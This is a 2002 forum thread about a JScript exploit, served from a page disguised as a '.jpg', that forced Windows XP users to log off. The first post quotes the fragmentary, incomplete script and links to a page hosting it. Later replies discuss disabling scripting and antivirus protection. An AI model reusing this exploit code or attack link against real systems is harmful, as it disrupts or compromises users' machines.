XP very vunreable for scripts..

Discussion in 'Windows Desktop Systems' started by ScIveRXP, Mar 25, 2002.

  1. ScIveRXP

    ScIveRXP Guest

    Hello - well I found out lately that its really easy to make an XP pc logout - I was direct to a webpage with a .jpg - I thought what could go wrong..

    well the .jpg had this as the content :
    		<SCRIPT language=JScript>
    			var programName=new Array(
    			function Init(){
    				var oPopup=window.createPopup();
    				var oPopBody=oPopup.document.body;
    				var n,html='';
    				html+="<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' CODEBASE='"+programName[n]+"' %1='r'></OBJECT>";
    				oPopup.show(290, 390, 200, 200, document.body);
    	<BODY onload="Init()">
    	You should feel lucky if you dont have XP right now.
    So I saw something and before I knew my XP logged me off.. I asked the maker of this script and he said it was even possible to add users to a system..

    If you haven't got XP installed in a standard dir like stated above then you are save - but else its very easy to do harm to XP users...

    WOW !!

    Don't believe me !? http://www.phphq.nl/xp.jpg (save your work before clicking on this link !!)
  2. MaDCeLL

    MaDCeLL Guest

    *ouch* that hurts...

    thx a million 4 da info *scriptingdeactivated*
  3. WebDome

    WebDome Guest

    Just visit this page, so he is using js exploit, easy detectible by AV software. If you are using AV, update your windows XP with critical updates you are out of trouble. By the way I am running Win XP Pro and it couldn't shout me down.
  4. Shamus MacNoob

    Shamus MacNoob Moderator Political User

    L'Ile Perrot Quebec
    Well I am on XP pro as well and I needed to set active scripting off in IE because that exploit was not detected by NAV2002 and all my security patches are up to date at microshot ......and I would be logged off ...... now I am ok but still somethings not right NAV2002 should not let that happen?? ..........
  5. WebDome

    WebDome Guest

    Norton, neither Mcafee is not a good choice of AV. Try Kaspersky (known as KAV), or NOD 32 (Esset Antivirus).
  6. Raven76

    Raven76 Guest

    Hmmm...my installation is on the D:\ drive so I'm unaffected. That could be a nasty trick if it got you at a bad time.
  7. dickow

    dickow Guest

    I have Norton 2002 installed with scripting protection on, tried the web site, and it didn't shut me down on my XP system, so something is working ok.
  8. Twink

    Twink Guest

    heh, boy am I glad I f*cked my install, I got c:\windows.0\ so it don't affect me =D
  9. Gnu

    Gnu OSNN Addict

    That's actually pretty shoddy programming ... you can call windir in just about any API.